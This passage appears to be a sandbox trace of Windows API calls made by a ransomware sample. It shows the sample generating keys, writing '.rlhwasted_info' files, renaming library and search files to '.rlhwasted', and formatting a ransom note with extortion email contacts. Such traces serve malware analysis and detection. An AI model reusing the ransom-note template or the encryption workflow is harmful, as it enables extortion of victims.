ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]M15XyMn8eQlqwvwg4CisQcwSFZEH/eZXRyfWOMtS45MCGa6s+MUD3FWKQToPDNbb\r\n1/YzgY/KlfeUCfYPzfyVQPkvdlFmyy2U2F4jsMvyypCrWYo6WuVd6XglRq34bMWJ\r\n5kG67eDyIM57r+LtQj7AWHkymHa2mVy97a9Ks2vmVlmejVIR+Me/j7LAwhVbJBm3\r\naYf54leinkjyWDTT9y9JCDspw0iv1nvDza4wI4pkUxlQUCXmuTof+KjcP4j9tpxm\r\n30NNmXpyEs7gKp1oPjIRoGd9zqBlFKql6NtncZqrlGZm03zVn5r5Z/CaBvN1rczh\r\nvwFfzVJsPITGQttCszYfd3mzVqRSwcFDcbo+jSq9aNIfYnZT2y4+mEVmoBmdhTOe\r\nGNaIT3bfQfHCuq1rWL+uB2r0dOPXDmdmm3mBRcTMYkeacXRHN5eXacNpD2kOpJBd\r\nc8IK+/b9F7z0Qr7+Win2Y78QN4bTcBWamzyBBDLh9H4hMp+cZCIw6PraRhNK3Udw\r\nD0xm9+1sP0+hC/H/Jjt80ZdO3QwLxHBQxcHL5yKmRw8HmDKucDkxHZzBgXCHHnxt\r\naAWT6ZgPgjxWGsQ8Xf0qitC/kG+6ZdqJFZBPBoMhEg4LWztNZdwcICZBFNGUb1f/\r\nQV42HlgGMm3QReRj3b+SeomL3DkCi3Cr6QytLdSxBLG=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.639] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5718 | out: hHeap=0x6b0000) returned 1 [0199.639] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.639] SetEndOfFile (hFile=0x104) returned 1 [0199.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.642] CloseHandle (hObject=0x104) returned 1 [0199.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.642] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713418 | out: hHeap=0x6b0000) returned 1 [0199.645] _aulldvrm () returned 0x0 [0199.645] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0199.646] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.646] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.646] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0199.646] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26e) returned 0x6d4580 [0199.646] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.646] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.646] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0199.647] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.647] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted_info" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.649] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.650] SetEndOfFile (hFile=0x104) returned 1 [0199.650] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.650] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.651] lstrcpyW (in: lpString1=0x6d45e4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.rlhwasted")) returned 1 [0199.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0199.654] GetLastError () returned 0x5 [0199.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.rlhwasted")) returned 0x23 [0199.654] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted", dwFileAttributes=0x22) returned 1 [0199.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.654] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0199.655] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xf8 [0199.655] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x6a0000 [0199.655] CloseHandle (hObject=0x128) returned 1 [0199.655] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.655] CloseHandle (hObject=0x124) returned 1 [0199.655] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.rlhwasted", dwFileAttributes=0x23) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.656] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0199.657] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.657] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.657] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0199.658] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.658] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5718 [0199.668] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.668] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AxoP7kvvg+4fkshM0zslXll1by0b+g/7WsS1G8HpGDrVqXek7/FFJRz4PfyDDMTT\r\nsYUYMhG5qLRHwcP7s/DwZsZGftv9Biy4GORI42vw+G4p6vgy9XOWPec0geVwYKST\r\nPY7hB00RYspM+lidaSAPmQeaKQWkXmE5sX771MVifKWIrkdTn+xuGEyQ1zObBP1e\r\n5iBusa+6j3ne0j9pjtSO4YBAufTJStshOOXX7529is6+f68ItGYGO14PJvR29uVT\r\nKXEHX2TlravYmcce6nza+kLM69Id9FIB3hfrtyDnqwZDmqr+0kHo07kd6ljtDonA\r\nesvlwFPWMuGmNGszENYOhlCPPbGeVLrNKvkW6P75LbsmUIKhUn9whkhru1G3jrE2\r\noOVb3Rg2k0JLhHq+LHZkVi3umIrJFOLyse1bNSMGCMNPPv1+hQpaXoPqEiyx3Yrx\r\nCysmrPYL7xtuHqW0Z9WZDdOfKrUnLFhdvvtciP8mhCvfeR1ZRCh4gVM/zZFfWQxc\r\n5u3ujnXnBgMw0V97do9SMMUiWjwQ4BhIbgs/RpebTPG/b9urJvNOkZxoI3TiLzvI\r\nSddW7RU/Cpx5tnIJpuGHLQ9VR2xR4JTd95fbJBStgHhGY2rmGy9c3faO316nTEsh\r\nQ3ccDaC77rwfxkm39WZaoFwSIS49zmwpCybItp6ejHe=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.668] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5718 | out: hHeap=0x6b0000) returned 1 [0199.668] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.669] SetEndOfFile (hFile=0x104) returned 1 [0199.671] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.671] CloseHandle (hObject=0x104) returned 1 [0199.671] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.671] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec488 | out: hHeap=0x6b0000) returned 1 [0199.671] _aulldvrm () returned 0x0 [0199.671] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0199.672] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.672] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.672] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0199.672] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x6d4580 [0199.672] lstrcpyW (in: lpString1=0x6d45f2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.672] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.672] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0199.673] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.673] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted_info" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.674] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.676] SetEndOfFile (hFile=0x104) returned 1 [0199.676] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.676] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.676] lstrcpyW (in: lpString1=0x6d45f2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.rlhwasted")) returned 1 [0199.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0199.677] GetLastError () returned 0x5 [0199.677] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.rlhwasted")) returned 0x23 [0199.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted", dwFileAttributes=0x22) returned 1 [0199.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0199.678] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.678] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xf8 [0199.678] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x6a0000 [0199.678] CloseHandle (hObject=0x124) returned 1 [0199.678] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.678] CloseHandle (hObject=0x128) returned 1 [0199.679] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.rlhwasted", dwFileAttributes=0x23) returned 1 [0199.679] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.679] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0199.680] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.680] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.680] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0199.681] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.681] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5718 [0199.694] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.694] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]j7vWlxLiu9ntkxp6sSgDMGYiMwVcqbVXd4+vZGQWKa0EdsIiAHZqzMT3xp4xRyi5\r\nRgSXEWZNgbNuY842eqBQ3cUaF4E8sZwgITqFJ6Gz4rN3DKkXh1EKD1aZXXOKKs6u\r\nLB+KR9hbv1TYkxhl2uaRakDbByVlwy+fKgEeBc272+Mo5f0y93bCpexvPUkcwAUs\r\nxfHnIumPLlOOupaArJEoKk4afJH+XIv6+z6HxkxKOWlYXSrWdwbXM6UtPKo6ks8Y\r\nKFpGqeyxiA6LsWBM3f+nwPXHtMcVw8WWMLkmsej759Hax37NGRf0+QXPMafnzhCj\r\nd7x0dYB+9BjTcx7h+eYkHHV4jTJObf6XPU/SdLlt6Lp9kOdUMLRRyGByx1cVqCM0\r\nHmJJG7Op1lxyuhziBbKm+v40l8GPLsezVRQkSF5GN2WAvZ+fLAgjE+V0cqA08ZfC\r\nW3Gl88Xm2b4o+jM9Xm4usP6bf1Gljh09/vfs8VjbXEYfqO4QzgpvXn/PAdFJTs4w\r\nxtEmEcBb7Dfrx67FSta+TKc62i6Z9/K1w/4z8prkkJje0aQNytH4kZo15LlQTwh/\r\n+rrEs5LSohrpFwkZtc5gPRKVGD+97Af0iNRzP+OtIprZgIoJ1lI3uCDJNH9EgiEs\r\nHPO+QozhwhPY5Or6gLi6D2FeNYwYUNTI/leMJUKsvOS=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.694] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5718 | out: hHeap=0x6b0000) returned 1 [0199.694] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.694] SetEndOfFile (hFile=0x104) returned 1 [0199.697] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.697] CloseHandle (hObject=0x104) returned 1 [0199.697] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.697] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706860 | out: hHeap=0x6b0000) returned 1 [0199.698] _aulldvrm () returned 0x0 [0199.698] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0199.699] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.699] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.699] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0199.699] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x270) returned 0x6d4580 [0199.699] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.699] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.699] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0199.700] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.700] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.rlhwasted_info" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.704] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.706] SetEndOfFile (hFile=0x104) returned 1 [0199.706] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.706] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.706] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.rlhwasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.rlhwasted")) returned 1 [0199.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.rlhwasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.707] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0199.707] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x36c [0199.707] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36c) returned 0x6a0000 [0199.707] CloseHandle (hObject=0x128) returned 1 [0199.721] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.722] CloseHandle (hObject=0x124) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.722] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0199.723] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.723] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.723] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0199.724] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.724] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5718 [0199.734] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.734] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 